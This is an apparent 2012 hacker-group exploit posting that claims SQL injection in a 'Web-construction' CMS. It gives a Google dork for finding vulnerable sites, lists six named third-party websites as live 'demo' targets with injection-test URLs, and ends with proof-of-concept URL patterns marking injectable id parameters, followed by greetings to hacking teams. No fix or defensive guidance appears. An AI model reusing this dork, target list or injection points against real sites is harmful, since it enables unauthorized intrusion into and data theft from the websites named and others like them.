facebook facebook twitter rss

Web-construction - Sql Injection

Author: Mataty501 , Published: 07-05-2012
__  __       _        _         _____  ___  __ 
| \/ | | | | | | ____|/ _ \/_ |
| \ / | __ _| |_ __ _| |_ _ _| |__ | | | || |
| |\/| |/ _` | __/ _` | __| | | |___ \| | | || |
| | | | (_| | || (_| | |_| |_| |___) | |_| || |
|_| |_|\__,_|\__\__,_|\__|\__, |____/ \___/ |_|
__/ |
|___/ On Expl0it 4 Arab

====================== Vulnerability info ======================
[+]Title: [Web-construction - Sql Injection]
[+]Vendor: [http://www.web-construction.info/]
[+]Date: [29/04/2012]
[+]Author: [Mataty501]
[+]Email: [mataty501@gmail.com]
[+]Category: [Webapps]
[+]Google dork: [intext:"Powered by web-construction" + inurl:"?id="]
[+]Tested on: [Windows7 , BT~5]
[+]Demo site: [http://www.construction.am/page.php?id=40%27]
[http://www.clearlycomputers.com/Articles.aspx?id=406%27]
[http://www.journaltocs.ac.uk/articleHomePage.php?id=5510102%27&userID=0%27]
[http://www.funnybuildings.com/page.php?id=139%27]
[http://www.madmanmuntzmovie.com/index.php?m=2%27]
[http://www.building.am/page.php?id=100%27]

~And more On Google
====================== Vulnerability Details ====================

[~]Exploit/p0c:

www.site.com/page.php?id=[SQL]'
www.site.com/Articles.aspx?id=[SQL]'
www.site.com/progressbuilding.php?id=[SQL]'
www.site.com/articleHomePage.php?id=5510102%27&userID=[SQL]'

=================================================================

Greetz to : [Expl0it 4 arab Team] , [Team Mosta] And all DZ Hackers.

=================================================================

Like us on Facebook :